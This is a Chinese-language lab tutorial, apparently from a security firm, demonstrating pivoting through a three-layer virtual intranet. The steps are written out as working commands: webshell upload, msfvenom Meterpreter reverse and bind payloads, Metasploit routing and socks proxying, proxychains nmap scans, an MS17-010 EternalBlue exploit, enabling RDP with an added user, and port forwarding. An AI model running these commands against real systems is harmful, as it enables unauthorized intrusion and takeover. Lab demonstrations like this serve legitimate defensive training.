我猜你也在找内网渗透，这篇难道还不够你嚼烂？

近年来，攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜，攻击者在经常会企业的内网进行横向渗透，令防守方防不胜防。因此，我们应该严格控制好网络区域之间的访问规则，加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供，旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。

1.实验简介

网络拓扑图

渗透机：win10+kali

第一层靶机 (外网 web 服务器): Linux

第二场靶机 (内网 web 服务器): Linux

第三层靶机 (内网办公机) : win7

用三层网络来模拟内外网环境,主要了解 MSF、内网转发等。

2.环境搭建

第一层网络

把渗透机 kali 和 win10 网卡 1 设置选择 VMnet1：

靶机 Linux 网卡 1 设置选择 VMnet1，添加网卡 2 设置选择 VMnet2：

第二层网络

将第二台靶机 Linux 网卡 1 设置选择 VMnet2，添加网卡 2 设置选择 VMnet3：

第三层网络

将靶机 win7 网卡 1 设置选择 VMnet3：

再配置好各台机器对应 IP 即可。

最后

在第一台 Linux 和第二台 Linux 上搭建一个 php 上传页面，设为存在文件上传漏洞的 web 页面，以便后续的拿 shell 进行内网渗透。

第一台 Linux

第二台 Linux

3.实验过程

第一层靶机

win10 访问http://192.168.85.131/直接上传一句话木马

蚁剑连接

进一步做内网渗透，上传 msf 后门

打开 kali msfconsole 输入 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf

生成一个名为 mshell.elf 的 msf 后门文件

蚁剑把后门文件上传到 Linux 靶机

返回 msf 开启监听

use exploit/multi/handler 使用监听模块 set payload linux/x64/meterpreter/reverse_tcp 使用和木马相同的 payloadset lhost 192.168.85.128 kaili 的 ipset lport 4444 木马的端口 run 执行

蚁剑打开虚拟终端 cd 到后门文件的目录下,执行后门文件，输入

chmod 777 mshell.elf 加执行权限./mshell.elf 执行文件

Kail 接受到 MSF 会话

输入 ifconfig，发现第二层 172.10.10.0/24 网段

添加路由

background 将会话转到后台 route add 172.10.10.0/24 1 添加 172.10.10.0/24 网段 使用 session1route print 查看路由表

使用 MSF 建立 socks 代理

use auxiliary/server/socks4aset srvhost 192.168.85.128set srvport 10080run

配置 socks4 代理的相关客户端 Proxychains 在配置文件/etc/proxychains.conf 中添加：socks4 192.168.85.128 10080vi /etc/proxychains.conf

添加 socks4 192.168.85.128 10080

这样利用 proxychains 启动的应用都可以带 sock4 代理，proxychains 为 kali 自带的，非 MSF 里的。

建立好代理后渗透机可以通过这台 Linux 当跳板机进入第二层网络

第二层网络

nmap 探测存在 web 服务的主机

用 proxychans 启动 nmap 对第二层网段进行 80 端口扫描，执行 proxychains nmap -sT -Pn -p 80 172.10.10.0/24

扫描发现 55 和 56 存在 web 服务,172.10.10.56 即为第二层网络的 ip

由于 proxychains 无法代理 icmp 的数据包，所以必须添加-sT -Pn 参数,即不检测主机是否存活,直接进行端口 tcp 扫描。

脚本探测存活主机

在本地创建一个名为 ping.sh 的脚本，脚本内容如下：

#!/bin/baship=”172.10.10.”echo “ping log:” > ./ping.txtfor i in {1..254}doping -c 1 -w 1 -W 1 $ip$i | grep -q “ttl=” && echo “$ip$i [yes]” >> ./ping.txt || echo “$ip$i [no]” >> ./ping.txt &doneecho “wait 5s….”sleep 5cat ./ping.txtcat ./ping.txt | wc -l

Kali 进入 session1 会话，然后 upload 命令上传刚刚创建的脚本到靶机 upload /root/ping.sh /var/www/hrml/upload

进入 shell 执行

python -c ‘import pty;pty.spawn(“/bin/bash”)’

创建一个完全交互式 shell，后

Chmod 777 ping.sh./ping.sh

可以看到 172.10.10.0/24 网段存活 56.57 两台

知道存活主机 ip 后就可以继续进入第二层内网主机

渗透机浏览器配置 sock4a 代理

蚁剑加代理连接

连接 http://172.10.10.56/upload/php1.php

进一步做内网渗透，继续上传 msf 后门

制作 MSF 后门

返回 kali msf 输入

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4455 -f elf > mshell1.elf

生成 mshell1.elf 后门文件

因为在内网跨网段时无法反向代理连接到渗透的机器，所以这里使用 linux/x64/meterpreter/bind_tcp 这个 payload 进行正向代理连接。蚁剑上传后门

蚁剑打开虚拟终端执行后门文件

返回会话

输入 ifconfig 发现第三层网络的网段 10.10.10.0/24

第三层网络

添加路由

backgroundroute add 10.10.10.0/24 2route print

进入 session 2 上传 脚本 探测存活主机注意把脚本的 ip 段修改成该网段再上传

探测到第三层网段的存活 ip ：10.10.10.101

proxychans 启动 nmap 对 10.10.10.101 的 1-500 端口扫描，执行 proxychains nmap -sT -Pn -p 1-500 10.10.10.101

发现 445 端口开启

尝试使用 ms17-010use windows/smb/ms17_010_eternalblueset rhost 10.10.10.101set payload windows/x64/meterpreter/bind_tcpset lport 4466

Run ，存在 445 漏洞

执行成功，返回会话

开启 3389 远程桌面

run post/windows/manage/enable_rdp 开启远程桌面 run post/windows/manage/enable_rdp USERNAME=zzy PASSWORD=123qwe!@# 添加远程用户

将 3389 端口转回 kali 本地 5555 端口 portfwd add -l 5555 -p 3389 -r 10.10.10.101

Win10 远程桌面连接

登陆成功

网络安全是一门大学问，要想理解透彻还得一步一步来，对此，我整理了一份小白走向渗透的知识总结，还有视频素材，可以对比着学习，大家下载就行【点此下载】

好了，大概内网渗透流程就是这样子的,喜欢本文的一键三连~